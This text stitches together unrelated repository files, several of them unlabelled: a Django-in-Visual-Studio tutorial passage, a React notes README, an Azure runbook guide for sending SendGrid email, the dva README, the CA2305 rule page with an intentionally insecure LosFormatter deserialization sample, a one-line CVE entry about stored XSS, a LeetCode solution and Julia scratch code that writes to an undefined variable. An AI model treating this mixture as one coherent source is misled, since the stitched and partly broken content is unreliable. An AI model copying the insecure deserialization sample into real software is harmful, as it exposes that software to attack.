You can organize files using any folder structure within *static* that you like, and then use relative paths within that folder to refer to the files. To demonstrate this process, the following steps add a CSS file to the app, then use that stylesheet in the *index.html* template:
1. In **Solution Explorer**, right-click the **HelloDjangoApp** folder in the Visual Studio project, select **Add** > **New folder**, and name the folder `static`.
1. Right-click the **static** folder and select **Add** > **New item**. In the dialog that appears, select the **Stylesheet** template, name the file `site.css`, and select **OK**. The **site.css** file appears in the project and is opened in the editor. Your folder structure should appear similar to the following image:

1. Replace the contents of *site.css* with the following code and save the file:
```css
.message {
font-weight: 600;
color: blue;
}
```
1. Replace the contents of the app's *templates/HelloDjangoApp/index.html* file with the following code, which replaces the `<strong>` element used in step 2 with a `<span>` that references the `message` style class. Using a style class in this way gives you much more flexibility in styling the element. (If you haven't moved *index.html* into a subfolder in *templates* when using VS 2017 15.7 and earlier, refer to [template namespacing](learn-django-in-visual-studio-step-02-create-an-app.md#template-namespacing) in step 2-4.)
```html
<html>
<head>
<title>{{ title }}</title>
{% load staticfiles %} <!-- Instruct Django to load static files -->
<link rel="stylesheet" type="text/css" href="{% static 'site.css' %}" />
</head>
<body>
<span class="message">{{ message }}</span>{{ content }}
</body>
</html>
```
1. Run the project to observe the results. Stop the server when done, and commit your changes to source control if you like (as explained in [step 2](learn-django-in-visual-studio-step-02-create-an-app.md#commit-to-source-control)).
### Question: What is the purpose of the {% load staticfiles %} tag?
Answer: The `{% load staticfiles %}` line is required before referring to static files in elements like `<head>` and `<body>`. In the example shown in this section, "staticfiles" refers to a custom Django template tag set, which is what allows you to use the `{% static %}` syntax to refer to static files. Without `{% load staticfiles %}`, you'll see an exception when the app runs.
### Question: Are there any conventions for organizing static files?
Answer: You can add other CSS, JavaScript, and HTML files in your *static* folder however you want. A typical way to organize static files is to create subfolders named *fonts*, *scripts*, and *content* (for stylesheets and any other files). In each case, remember to include those folders in the relative path to the file in `{% static %}` references.
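For example (the file names here are made up for illustration), references into those subfolders simply include the folder in the relative path:

```html
{% load staticfiles %}
<link rel="stylesheet" type="text/css" href="{% static 'content/site.css' %}" />
<script src="{% static 'scripts/app.js' %}"></script>
<img src="{% static 'content/logo.png' %}" alt="Logo" />
```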
## Step 3-3: Add a page to the app
Adding another page to the app means the following:
- Add a Python function that defines the view.
- Add a template for the page's markup.
- Add the necessary routing to the Django project's *urls.py* file.
The following steps add an "About" page to the "HelloDjangoApp" project, and links to that page from the home page:
1. In **Solution Explorer**, right-click the **templates/HelloDjangoApp** folder, select **Add** > **New item**, select the **HTML Page** item template, name the file `about.html`, and select **OK**.
> [!Tip]
> If the **New Item** command doesn't appear on the **Add** menu, make sure that you've stopped the server so that Visual Studio exits debugging mode.
1. Replace the contents of *about.html* with the following markup (you replace the explicit link to the home page with a simple navigation bar in step 3-4):
```html
<html>
<head>
<title>{{ title }}</title>
{% load staticfiles %}
<link rel="stylesheet" type="text/css" href="{% static 'site.css' %}" />
</head>
<body>
<div><a href="home">Home</a></div>
{{ content }}
</body>
</html>
```
1. Open the app's *views.py* file and add a function named `about` that uses the template:
```python
def about(request):
return render(
request,
"HelloDjangoApp/about.html",
{
'title' : "About HelloDjangoApp",
'content' : "Example app page for Django."
}
)
```
1. Open the Django project's *urls.py* file and add the following line to the `urlPatterns` array:
```python
url(r'^about$', HelloDjangoApp.views.about, name='about'),
```
1. Open the *templates/HelloDjangoApp/index.html* file and add the following line below the `<body>` element to link to the About page (again, you replace this link with a nav bar in step 3-4):
```html
<div><a href="about">About</a></div>
```
1. Save all the files using the **File** > **Save All** menu command, or just press **Ctrl**+**Shift**+**S**. (Technically, this step isn't needed as running the project in Visual Studio saves files automatically. Nevertheless, it's a good command to know about!)
1. Run the project to observe the results and check navigation between pages. Close the server when done.
### Question: I tried using "index" for the link to the home page, but it didn't work. Why?
Answer: Even though the view function in *views.py* is named `index`, the URL routing patterns in the Django project's *urls.py* file do not contain a regular expression that matches the string "index". To match that string, you need to add another entry for the pattern `^index$`.
As shown in the next section, it's much better to use the `{% url '<pattern_name>' %}` tag in the page template to refer to the *name* of a pattern, in which case Django creates the proper URL for you. For example, replace `<div><a href="home">Home</a></div>` in *about.html* with `<div><a href="{% url 'index' %}">Home</a></div>`. The use of 'index' works here because the first URL pattern in *urls.py* is, in fact, named 'index' (by virtue of the `name='index'` argument). You can also use 'home' to refer to the second pattern.
## Step 3-4: Use template inheritance to create a header and nav bar
Instead of having explicit navigation links on each page, modern web apps typically use a branding header and a navigation bar that provides the most important page links, popup menus, and so on. To make sure the header and nav bar are the same across all pages, however, you don't want to repeat the same code in every page template. You instead want to define the common parts of all your pages in one place.
Django's templating system provides two means for reusing specific elements across multiple templates: includes and inheritance.
- *Includes* are other page templates that you insert at a specific place in the referring template using the syntax `{% include <template_path> %}`. You can also use a variable if you want to change the path dynamically in code. Includes are typically used in the body of a page to pull in the shared template at a specific location on the page.
- *Inheritance* uses the `{% extends <template_path> %}` at the beginning of a page template to specify a shared base template that the referring template then builds upon. Inheritance is commonly used to define a shared layout, nav bar, and other structures for an app's pages, such that referring templates need only add or modify specific areas of the base template called *blocks*.
In both cases, `<template_path>` is relative to the app's *templates* folder (`../` or `./` are also allowed).
A base template delineates blocks using `{% block <block_name> %}` and `{% endblock %}` tags. If a referring template then uses tags with the same block name, its block content overrides that of the base template.
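As a minimal sketch of the two mechanisms (the file names are hypothetical, and the two fragments below are separate child templates):

```html
<!-- with-include.html: pastes nav.html at exactly this spot in the body -->
<body>
  {% include "HelloDjangoApp/nav.html" %}
</body>

<!-- with-inheritance.html: the extends tag must come first; only blocks are overridden -->
{% extends "HelloDjangoApp/layout.html" %}
{% block content %}
  <p>Page-specific markup goes here.</p>
{% endblock %}
```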
The following steps demonstrate inheritance:
1. In the app's *templates/HelloDjangoApp* folder, create a new HTML file (using the **Add** > **New item** context menu or **Add** > **HTML Page**) called *layout.html*, and replace its contents with the markup below. You can see that this template contains a block named "content" that is all that the referring pages need to replace:
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>{{ title }}</title>
{% load staticfiles %}
<link rel="stylesheet" type="text/css" href="{% static 'site.css' %}" />
</head>
<body>
<div class="navbar">
<a href="/" class="navbar-brand">Hello Django</a>
<a href="{% url 'home' %}" class="navbar-item">Home</a>
<a href="{% url 'about' %}" class="navbar-item">About</a>
</div>
<div class="body-content">
{% block content %}{% endblock %}
<hr/>
<footer>
<p>© 2018</p>
</footer>
</div>
</body>
</html>
```
1. Add the following styles to the app's *static/site.css* file (this walkthrough isn't attempting to demonstrate responsive design here; these styles are simply to generate an interesting result):
```css
.navbar {
background-color: lightslategray;
font-size: 1em;
font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
color: white;
padding: 8px 5px 8px 5px;
}
.navbar a {
text-decoration: none;
color: inherit;
}
.navbar-brand {
font-size: 1.2em;
font-weight: 600;
}
.navbar-item {
font-variant: small-caps;
margin-left: 30px;
}
.body-content {
padding: 5px;
font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
```
1. Modify *templates/HelloDjangoApp/index.html* to refer to the base template and override the content block. You can see that by using inheritance, this template becomes simple:
```html
{% extends "HelloDjangoApp/layout.html" %}
{% block content %}
<span class="message">{{ message }}</span>{{ content }}
{% endblock %}
```
1. Modify *templates/HelloDjangoApp/about.html* to also refer to the base template and override the content block:
```html
{% extends "HelloDjangoApp/layout.html" %}
{% block content %}
{{ content }}
{% endblock %}
```
1. Run the server to observe the results. Close the server when done.

1. Because you'd made substantial changes to the app, it's again a good time to [commit your changes to source control](learn-django-in-visual-studio-step-02-create-an-app.md#commit-to-source-control).
## Next steps
> [!div class="nextstepaction"]
> [Use the full Django Web Project template](learn-django-in-visual-studio-step-04-full-django-project-template.md)
## Go deeper
- [Deploy the web app to Azure App Service](publishing-python-web-applications-to-azure-from-visual-studio.md)
- [Writing your first Django app, part 3 (views)](https://docs.djangoproject.com/en/2.0/intro/tutorial03/) (docs.djangoproject.com)
- For more capabilities of Django templates, such as control flow, see [The Django template language](https://docs.djangoproject.com/en/2.0/ref/templates/language/) (docs.djangoproject.com)
- For complete details on using the `{% url %}` tag, see [url](https://docs.djangoproject.com/en/2.0/ref/templates/builtins/#url) within the [Built-in template tags and filters for Django templates reference](https://docs.djangoproject.com/en/2.0/ref/templates/builtins/) (docs.djangoproject.com)
- Tutorial source code on GitHub: [Microsoft/python-sample-vs-learning-django](https://github.com/Microsoft/python-sample-vs-learning-django)
[source: docs/front/React/README.md | ht1131589588/web-library | MIT]

# React Series
Mastering a technology generally takes three stages: reading the documentation, applying it, and reading the source code.

This document records practical uses of React and digs deeper by reading the source code of the React ecosystem. The goal of reading source code is not to rebuild the same wheel, but to learn more from other people's code and write better applications.

Contents:

- [React usage summary](./React使用总结.md)
- [Exploring the Redux source code](./Redux源码探索.md)
- [Common React interview questions](./React常见面试题.md)
- [React source code explained](./React源码深入浅出.md)
[source: articles/automation/automation-send-email.md | Seacloud1/azure-docs | CC-BY-4.0, MIT]

---
title: Send an email from an Azure Automation runbook
description: This article tells how to send an email from within a runbook.
services: automation
ms.subservice: process-automation
ms.date: 07/15/2019
ms.topic: conceptual
---
# Send an email from a runbook
You can send an email from a runbook with [SendGrid](https://sendgrid.com/solutions) using PowerShell.
## Prerequisites
* Azure subscription. If you don't have one yet, you can [activate your MSDN subscriber benefits](https://azure.microsoft.com/pricing/member-offers/msdn-benefits-details/) or sign up for a [free account](https://azure.microsoft.com/free/?WT.mc_id=A261C142F).
* [A SendGrid account](../sendgrid-dotnet-how-to-send-email.md#create-a-sendgrid-account).
* [Automation account](./index.yml) with **Az** modules.
* [Run As account](./manage-runas-account.md) to store and execute the runbook.
## Create an Azure Key Vault
You can create an Azure Key Vault using the following PowerShell script. Replace the variable values with values specific to your environment. Use the embedded Azure Cloud Shell via the **Try It** button, located in the top right corner of the code block. You can also copy and run the code locally if you have the [Az modules](/powershell/azure/install-az-ps) installed on your local machine.
> [!NOTE]
> To retrieve your API key, use the steps in [Find your SendGrid API key](../sendgrid-dotnet-how-to-send-email.md#to-find-your-sendgrid-api-key).
```azurepowershell-interactive
$SubscriptionId = "<subscription ID>"
# Sign in to your Azure account and select your subscription
# If you omit the SubscriptionId parameter, the default subscription is selected.
Connect-AzAccount -SubscriptionId $SubscriptionId
# Use Get-AzLocation to see your available locations.
$region = "southcentralus"
$KeyVaultResourceGroupName = "mykeyvaultgroup"
$VaultName = "<Enter a universally unique vault name>"
$SendGridAPIKey = "<SendGrid API key>"
$AutomationAccountName = "testaa"
# Create new Resource Group, or omit this step if you already have a resource group.
New-AzResourceGroup -Name $KeyVaultResourceGroupName -Location $region
# Create the new key vault
$newKeyVault = New-AzKeyVault -VaultName $VaultName -ResourceGroupName $KeyVaultResourceGroupName -Location $region
$resourceId = $newKeyVault.ResourceId
# Convert the SendGrid API key into a SecureString
$Secret = ConvertTo-SecureString -String $SendGridAPIKey -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $VaultName -Name 'SendGridAPIKey' -SecretValue $Secret
# Grant access to the Key Vault to the Automation Run As account.
$connection = Get-AzAutomationConnection -ResourceGroupName $KeyVaultResourceGroupName -AutomationAccountName $AutomationAccountName -Name AzureRunAsConnection
$appID = $connection.FieldDefinitionValues.ApplicationId
Set-AzKeyVaultAccessPolicy -VaultName $VaultName -ServicePrincipalName $appID -PermissionsToSecrets Set, Get
```
For other ways to create an Azure Key Vault and store a secret, see [Key Vault quickstarts](../key-vault/index.yml).
## Import required modules into your Automation account
To use Azure Key Vault within a runbook, you must import the following modules into your Automation account:
* [Az.Profile](https://www.powershellgallery.com/packages/Az.Profile)
* [Az.KeyVault](https://www.powershellgallery.com/packages/Az.KeyVault)
For instructions, see [Import Az modules](shared-resources/modules.md#import-az-modules).
## Create the runbook to send an email
After you have created a Key Vault and stored your `SendGrid` API key, it's time to create the runbook that retrieves the API key and sends an email. Let's use a runbook that uses `AzureRunAsConnection` as a [Run As account](./manage-runas-account.md) to
authenticate with Azure to retrieve the secret from Azure Key Vault. We'll call the runbook **Send-GridMailMessage**. You can modify the PowerShell script used for example purposes, and reuse it for different scenarios.
1. Go to your Azure Automation account.
2. Under **Process Automation**, select **Runbooks**.
3. At the top of the list of runbooks, select **+ Create a runbook**.
4. On the Add Runbook page, enter **Send-GridMailMessage** for the runbook name. For the runbook type, select **PowerShell**. Then, select **Create**.

5. The runbook is created and the Edit PowerShell Runbook page opens.

6. Copy the following PowerShell example into the Edit page. Ensure that the `VaultName` specifies the name you've chosen for your Key Vault.
```powershell-interactive
Param(
[Parameter(Mandatory=$True)]
[String] $destEmailAddress,
[Parameter(Mandatory=$True)]
[String] $fromEmailAddress,
[Parameter(Mandatory=$True)]
[String] $subject,
[Parameter(Mandatory=$True)]
[String] $content
)
$Conn = Get-AutomationConnection -Name AzureRunAsConnection
Connect-AzAccount -ServicePrincipal -Tenant $Conn.TenantID -ApplicationId $Conn.ApplicationID -CertificateThumbprint $Conn.CertificateThumbprint | Out-Null
$VaultName = "<Enter your vault name>"
$SENDGRID_API_KEY = (Get-AzKeyVaultSecret -VaultName $VaultName -Name "SendGridAPIKey").SecretValue
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", "Bearer " + $SENDGRID_API_KEY)
$headers.Add("Content-Type", "application/json")
$body = @{
personalizations = @(
@{
to = @(
@{
email = $destEmailAddress
}
)
}
)
from = @{
email = $fromEmailAddress
}
subject = $subject
content = @(
@{
type = "text/plain"
value = $content
}
)
}
$bodyJson = $body | ConvertTo-Json -Depth 4
$response = Invoke-RestMethod -Uri https://api.sendgrid.com/v3/mail/send -Method Post -Headers $headers -Body $bodyJson
```
7. Select **Publish** to save and publish the runbook.
To verify that the runbook executes successfully, you can follow the steps under [Test a runbook](manage-runbooks.md#test-a-runbook) or [Start a runbook](start-runbooks.md).
If you don't initially see your test email, check your **Junk** and **Spam** folders.
## Clean up resources after the email operation
1. When the runbook is no longer needed, select it in the runbook list and click **Delete**.
2. Delete the Key Vault by using the [Remove-AzKeyVault](/powershell/module/az.keyvault/remove-azkeyvault?view=azps-3.7.0) cmdlet.
```azurepowershell-interactive
$VaultName = "<your KeyVault name>"
$ResourceGroupName = "<your ResourceGroup name>"
Remove-AzKeyVault -VaultName $VaultName -ResourceGroupName $ResourceGroupName
```
## Next steps
* To send runbook job data to your Log Analytics workspace, see [Forward Azure Automation job data to Azure Monitor logs](automation-manage-send-joblogs-log-analytics.md).
* To monitor base-level metrics and logs, see [Use an alert to trigger an Azure Automation runbook](automation-create-alert-triggered-runbook.md).
* To correct issues arising during runbook operations, see [Troubleshoot runbook issues](./troubleshoot/runbooks.md).
# dva
[](https://npmjs.org/package/dva)
[](https://travis-ci.org/dvajs/dva)
[](https://coveralls.io/r/dvajs/dva)
[](https://npmjs.org/package/dva)
[](https://david-dm.org/dvajs/dva)
[](https://gitter.im/dvajs/Lobby?utm_source=share-link&utm_medium=link&utm_campaign=share-link)
[View in Chinese](./README_zh-CN.md)
Lightweight front-end framework based on [redux](https://github.com/reactjs/redux), [redux-saga](https://github.com/yelouafi/redux-saga) and [[email protected]](https://github.com/ReactTraining/react-router/tree/v2.8.1). (Inspired by [elm](http://elm-lang.org/) and [choo](https://github.com/yoshuawuyts/choo))
---
## Features
* **Easy to learn, easy to use**: only 6 APIs, very friendly to redux users
* **Elm concepts**: organize models with `reducers`, `effects` and `subscriptions`
* **Support mobile and react-native**: cross platform ([ReactNative Example](https://github.com/sorrycc/dva-example-react-native))
* **Support HMR**: support HMR for components, routes and models with [babel-plugin-dva-hmr](https://github.com/dvajs/babel-plugin-dva-hmr)
* **Support load model and routes dynamically**: Improve performance ([Example](https://github.com/dvajs/dva/tree/master/examples/dynamic-load))
* **Plugin system**: e.g. we have [dva-loading](https://github.com/dvajs/dva-loading) plugin to handle loading state automatically
* **Support TypeScript**: with d.ts ([Example](https://github.com/sorrycc/dva-boilerplate-typescript))
## Why dva ?
* [Why dva and what's dva](https://github.com/dvajs/dva/issues/1)
* [The evolution of Alipay's front-end application architecture (in Chinese)](https://www.github.com/sorrycc/blog/issues/6)
## Demos
* [Count](https://github.com/dvajs/dva/blob/master/examples/count) ([jsfiddle](https://jsfiddle.net/puftw0ea/3/)): Simple count example
* [User Dashboard](https://github.com/dvajs/dva-example-user-dashboard): User management dashboard
* [HackerNews](https://github.com/dvajs/dva-hackernews) ([Demo](https://dvajs.github.io/dva-hackernews/)): HackerNews Clone
* [antd-admin](https://github.com/zuiidea/antd-admin) ([Demo](http://zuiidea.github.io/antd-admin/)): Admin dashboard based on antd and dva
* [github-stars](https://github.com/sorrycc/github-stars) ([Demo](http://sorrycc.github.io/github-stars/#/?_k=rmj86f)): GitHub star management tool
* [react-native-dva-starter](https://github.com/nihgwu/react-native-dva-starter) a React Native starter powered by dva and react-navigation
## Quick Start
- [Getting Started](https://github.com/dvajs/dva/blob/master/docs/GettingStarted.md)
- [Build a user-management CRUD app in 12 steps and 30 minutes (react+dva+antd, in Chinese)](https://github.com/sorrycc/blog/issues/18)
## FAQ
### Why is it called dva?
> D.Va’s mech is nimble and powerful — its twin Fusion Cannons blast away with autofire at short range, and she can use its Boosters to barrel over enemies and obstacles, or deflect attacks with her projectile-dismantling Defense Matrix.
From [Overwatch](http://ow.blizzard.cn/heroes/dva)
<img src="https://zos.alipayobjects.com/rmsportal/psagSCVHOKQVqqNjjMdf.jpg" width="200" height="200" />
### Is it production ready?
Sure! We have 100+ projects using dva, both in Alibaba and out.
### Does it support IE8?
No.
## Next
Some basic articles.
* The [8 Concepts](https://github.com/dvajs/dva/blob/master/docs/Concepts.md), and know how they are connected together
* [dva APIs](https://github.com/dvajs/dva/blob/master/docs/API.md)
* Checkout [dva knowledgemap](https://github.com/dvajs/dva-knowledgemap), including all the basic knowledge with ES6, React, dva
* Checkout [more FAQ](https://github.com/dvajs/dva/issues?q=is%3Aissue+is%3Aclosed+label%3Afaq)
* If your project is created by [dva-cli](https://github.com/dvajs/dva-cli), checkout how to [Configure it](https://github.com/sorrycc/roadhog/blob/master/README_en-us.md#configuration)
Want more?
* Check out dva's predecessor, [React + Redux best practices (in Chinese)](https://github.com/sorrycc/blog/issues/1), to learn how dva came about
* Slides from a GITC talk on dva: [React application framework practice at Ant Financial (in Chinese)](http://slides.com/sorrycc/dva)
* If you are still using [email protected], please [upgrade to 1.x](https://github.com/dvajs/dva/pull/42#issuecomment-241323617) as soon as possible
## License
[MIT](https://tldrlegal.com/license/mit-license)
---
title: "CA2305: Do not use insecure deserializer LosFormatter (code analysis)"
description: "Learn about code analysis rule CA2305: Do not use insecure deserializer LosFormatter"
ms.date: 05/01/2019
ms.topic: reference
author: dotpaul
ms.author: paulming
dev_langs:
- CSharp
- VB
f1_keywords:
- CA2305
- DoNotUseInsecureDeserializerLosFormatter
ms.openlocfilehash: ea1533d1174b33f34ac36f6141ea8f393afd454d
ms.sourcegitcommit: 2e4adc490c1d2a705a0592b295d606b10b9f51f1
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 09/25/2020
ms.locfileid: "96585270"
---
# <a name="ca2305-do-not-use-insecure-deserializer-losformatter"></a>CA2305: Do not use insecure deserializer LosFormatter

| | Value |
|-|-|
| **Rule ID** |CA2305|
| **Category** |Microsoft.Security|
| **Fix is breaking or non-breaking** |Non-breaking|

## <a name="cause"></a>Cause

A <xref:System.Web.UI.LosFormatter?displayProperty=nameWithType> deserialization method was called or referenced.

## <a name="rule-description"></a>Rule description

[!INCLUDE[insecure-deserializers-description](~/includes/code-analysis/insecure-deserializers-description.md)]

This rule finds <xref:System.Web.UI.LosFormatter?displayProperty=nameWithType> deserialization method calls or references.

`LosFormatter` is insecure and can't be made secure. For more information, see the [BinaryFormatter security guide](../../../standard/serialization/binaryformatter-security-guide.md).

## <a name="how-to-fix-violations"></a>How to fix violations

- Use a secure serializer instead, and **don't allow an attacker to specify an arbitrary type** to deserialize. For more information, see [Preferred alternatives](../../../standard/serialization/binaryformatter-security-guide.md#preferred-alternatives).
- Make the serialized data tamper-proof. After serialization, cryptographically sign the serialized data. Before deserialization, validate the cryptographic signature. Protect the cryptographic key from being disclosed, and design for key rotation.

## <a name="when-to-suppress-warnings"></a>When to suppress warnings

`LosFormatter` is insecure and can't be made secure.

## <a name="pseudo-code-examples"></a>Pseudo-code examples

### <a name="violation"></a>Violation
```csharp
using System.IO;
using System.Web.UI;
public class ExampleClass
{
public object MyDeserialize(byte[] bytes)
{
LosFormatter formatter = new LosFormatter();
return formatter.Deserialize(new MemoryStream(bytes));
}
}
```
```vb
Imports System.IO
Imports System.Web.UI
Public Class ExampleClass
Public Function MyDeserialize(bytes As Byte()) As Object
Dim formatter As LosFormatter = New LosFormatter()
Return formatter.Deserialize(New MemoryStream(bytes))
End Function
End Class
```
### [CVE-2020-15535](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15535)



### Description
An issue was discovered in the bestsoftinc Car Rental System plugin through 1.3 for WordPress. Persistent XSS can occur via any of the registration fields.
### POC
#### Reference
- https://packetstormsecurity.com/files/157118/WordPress-Car-Rental-System-1.3-Cross-Site-Scripting.html
#### Github
No PoCs found on GitHub currently.
# TweetAnalysis
## Use
From the directory, run `python .\main.py` and follow the instructions provided in the terminal.
---
layout: post
title: "Remove All adjacent Duplicates in String II"
modified:
categories: blog
excerpt:
tags: [leetcode]
image:
feature:
date: 2019-10-23
---
Given a string `s`, a *k* *duplicate removal* consists of choosing `k` adjacent and equal letters from `s` and removing them causing the left and the right side of the deleted substring to concatenate together.
We repeatedly make `k` duplicate removals on `s` until we no longer can.
Return the final string after all such duplicate removals have been made.
It is guaranteed that the answer is unique.
**Example 1:**
```
Input: s = "abcd", k = 2
Output: "abcd"
Explanation: There's nothing to delete.
```
**Example 2:**
```
Input: s = "deeedbbcccbdaa", k = 3
Output: "aa"
Explanation:
First delete "eee" and "ccc", get "ddbbbdaa"
Then delete "bbb", get "dddaa"
Finally delete "ddd", get "aa"
```
**Example 3:**
```
Input: s = "pbbcggttciiippooaais", k = 2
Output: "ps"
```
**Constraints:**
- `1 <= s.length <= 10^5`
- `2 <= k <= 10^4`
- `s` only contains lower case English letters.
**Solution:**
Iterate from left to right, maintaining the result string built so far plus, for each position of that string, the length of the run of identical characters ending there. Whenever a run's length reaches k, we remove those k characters.
```c++
class Solution {
public:
    string removeDuplicates(string s, int k) {
        string cur = "";                       // characters kept so far
        vector<int> run(s.size() + 1, 0);      // run[i]: length of the run ending at cur[i-1]
        for (int i = 1; i <= (int)s.size(); i++) {
            if (cur.empty() || cur.back() != s[i - 1]) {
                cur += s[i - 1];
                run[cur.size()] = 1;           // a new run starts
            } else {
                cur += s[i - 1];
                run[cur.size()] = run[cur.size() - 1] + 1;
                if (run[cur.size()] == k) {    // run reached k: remove it
                    cur = cur.substr(0, cur.size() - k);
                }
            }
        }
        return cur;
    }
};
```
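The same idea reads naturally as a stack of (character, run-length) pairs; here is a standalone sketch of that variant (Python used only for illustration, and the function name is mine):

```python
def remove_duplicates(s: str, k: int) -> str:
    # Stack of [char, run_length]; a run is dropped the moment it reaches k.
    stack = []
    for ch in s:
        if stack and stack[-1][0] == ch:
            stack[-1][1] += 1
            if stack[-1][1] == k:
                stack.pop()
        else:
            stack.append([ch, 1])
    return "".join(ch * n for ch, n in stack)

print(remove_duplicates("deeedbbcccbdaa", 3))  # prints "aa"
```

Both versions run in O(n) time, since every character is pushed and popped at most once.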
# Julia code backup
$$e^{ix}=\cos(x)+i\sin(x)$$
The Fourier transform formula:
$$X_k=\sum^{N-1}_{n=0} x_n \times e^{-i2\pi kn/N}$$
```julia
function 图片转md()
# md 的图片信息
# ls>>tmp.txt
tmp=""
str_vec=readlines("tmp.txt")
for item in str_vec
tmp="<br>"
println(tmp)
end
end
#图片转md()
function 特殊符号表()
内容=repeat("-|",20)*"\n"*repeat(":-:|",20)*"\n"
for i=1:5_0000
内容*=string(i)*"|&#"*string(i)*";|"
if i%10==0
内容*="\n"
end
end
write("符号表.md",内容)
@info "运行完成"
sleep(5)
end
#特殊符号表()
function stat_Char()
#exit=UInt[]
#str_vec=Char[]
count=0
tmp_str=""
for i=1:2^32
if isvalid(Char,i)
#push!(exit,i)
#push!(str_vec,Char(i))
tmp_str *="$(i) $(Char(i))\n"
else
#push!(noexit,i)
count+=1
end
end
#@info "存在的元素为$(length(exit))" #111_2063
#@info "不存在的元素为$(count)个" #42_9385_5233
#@info "最大的元素值为:$(maximum(exit)),$(minimum(exit))"
write("utf8.txt",tmp_str) #14M
end
#stat_Char() #utf8 code table
```
## A gnuplot-like plotting function
```julia
#using PyPlot
function 串序列转换为正整数(X)
newX=[]
for item in X
push!(newX,parse(Int,item))
end
return newX
end
function 串序列转换为浮点数(Y)
newY=[]
for item in Y
push!(newY,parse(Float32,item))
end
return newY
end
function 数据处理(数据文件名="data.txt",分隔符="\t")
数据行=readlines(数据文件名)
X=[]
Y=[]
Y1=[]
for 元素 in 数据行
x,y,y1=split(元素,分隔符)
#when three values are assigned to two names, the extra element is discarded
push!(X,x)
push!(Y,y)
push!(Y1,y1)
end
return X,Y,Y1
end
function 差值(Y)
newY=[]
for i=2:length(Y)
push!(newY,(Y[i]-Y[i-1]))
end
return newY
end
function 画图()
title("标题:宏观负债率")
X,Y,Y1=数据处理()
X=串序列转换为浮点数(X)
Y=串序列转换为浮点数(Y)
Y1=串序列转换为浮点数(Y1)
#plot(X,Y,"bo--",label="居民负债率")
plot(X[2:end],差值(Y),label="居民负债变化率")
#plot(X,Y1,"r^-",label="实体企业负债率")
#plot(X[2:end],差值(Y1),label="企业负债变化率")
grid()
legend()
show()
end
#画图()
```
```julia
# Grew 60x in 10 years: what is the annual multiplier?
# More generally: grew y-fold over n years; what is the per-year factor x?
function 年均增速计算(年数,倍数)
base,start=0.0,10.0
#@info base,start
    #binary search
function 比较(x) return (x^年数<倍数 ? true : false) end
function 平均(a,b) return (a+b)/2 end
while 比较(start)
start*=2
end
    for i=1:20 #limit precision to about four decimal places
tmp=平均(base,start)
if 比较(tmp)
base=tmp
else
start=tmp
end
#@info "执行次数$i;取值区间$base ~ $start"
end
return 平均(base,start)
end
@time @info 年均增速计算(10,60)
@time @info 年均增速计算(3.5,60000)
@time @info 年均增速计算(20,0.2)
```
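Bisection works here, but note that the closed form is simply the n-th root of the multiple, x = multiple^(1/years). A quick cross-check (Python, illustrative only; the function name is mine):

```python
def annual_growth(years: float, multiple: float) -> float:
    # Closed form for "grew `multiple`-fold over `years` years".
    return multiple ** (1.0 / years)

print(annual_growth(10, 60))  # about 1.51, i.e. roughly +50% per year
```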
## Digit sum of 2^1000

```julia
function 指数(num::Int,init::Int=2) #compute a power with a BigInt base
tmp::BigInt=init
return tmp^num
end
function sum_bigInt() #sum the decimal digits of 2^1000
function char2num(item::Char)
table=Dict(['0'=>0,'1'=>1,'2'=>2,'3'=>3,'4'=>4,'5'=>5,
'6'=>6,'7'=>7,'8'=>8,'9'=>9])
if item in keys(table)
return table[item]
end
end
num::Int=0
tmp_str=repr(指数(1000))
for char in tmp_str
num+=char2num(char)
end
@info "位数为:$(length(tmp_str))"
@info "2^1000:加和的结果为 $num ."
@info "每一位上的平均值为:$(num/length(tmp_str))"
@show tmp_str
end
sum_bigInt() #the result is 1366
```
## Ordered data -> shuffled data
```julia
#
# The inverse operation of sorting:
# ordered data -> shuffled data
#
function 交换(arr::Array,p1::Int,p2::Int)
tmp::Int=arr[p1]
arr[p1]=arr[p2]
arr[p2]=tmp
end
function 打散数据!(arr::Array) #shuffle via random swaps
size=length(arr)
系数=1
#0.3 0.5 0.6 0.7 0.8 0.9 1 1.2 2
#50 37 31 27 21 15 10 10 3
for i=1:Int(round(size*系数))
交换(arr,rand(1:size),rand(1:size))
end
end
function 打散数据2!(arr::Array)
size=length(arr)
系数=0.8
for i=1:Int(round(size*系数))
交换(arr,rand(1:size),rand(1:size))
end
tmp=arr[1]
for i=1:(size-1)
arr[i]=arr[i+1]
end
arr[size]=tmp
end
function 相似度检验(arr1::Array,arr2::Array)
size1=length(arr1)
size2=length(arr2)
@assert size1==size2 "两个集合的项数不等."
count::Int=0
for i=1:size1
if arr1[i]==arr2[i] count+=1 end
end
return round((count/size1),digits=4)
end
function test()
arr::Array=[]
arr_tmp::Array=[]
for i=1:100000 push!(arr,i);push!(arr_tmp,i) end
#@info arr[40:50]
#打散数据!(arr)
打散数据2!(arr)
#@info arr[40:50]
result=相似度检验(arr_tmp,arr)
@info "两个数组的相似度为:$(result*100)%"
end
test()
```
## Finding Pythagorean triples
```julia
"""
Find integer Pythagorean triples: 3,4,5 .......
a,b,c
(1) keep a fixed, sweep b over an interval, and search for c
    constraint: c^2 < a^2 + b^2
(2) a += 1, repeat (1)
"""
function 寻找勾股数(end_val::BigInt ) #arbitrarily large (BigInt) version
a::BigInt=3;
b::BigInt=3;
c::BigInt=3;
区间=100
@info "计算勾股整数对 开始......"
while a < end_val
while b<(a+区间)
while c< Int( round(sqrt(a^2+b^2)+1) )
if c^2 ==(a^2+b^2)
#@info "$a 的平方$(a^2) + $b 平方$(b^2)==$c 的平方$(c^2)"
write(io,"$a,$b,$c \n ")
end
c+=1
end
b+=1
c=b
end
a+=1
b=a
flush(io)
end
@info "计算结束!"
end
function 寻找勾股数(end_val::Int)
a=3;
b=3;
c=3;
区间=100
@info "计算勾股整数对 开始......"
while a < end_val
while b<(a+区间)
while c< Int( round(sqrt(a^2+b^2)+1) )
if c^2 ==(a^2+b^2)
write(io,"$a,$b,$c \n ")
end
c+=1
end
b+=1
c=b
end
a+=1
b=a
rand(1:10)==7 ? flush(io) : continue ;#avoid flushing every time; note the spaces around ?:
end
@info "计算结束!"
end
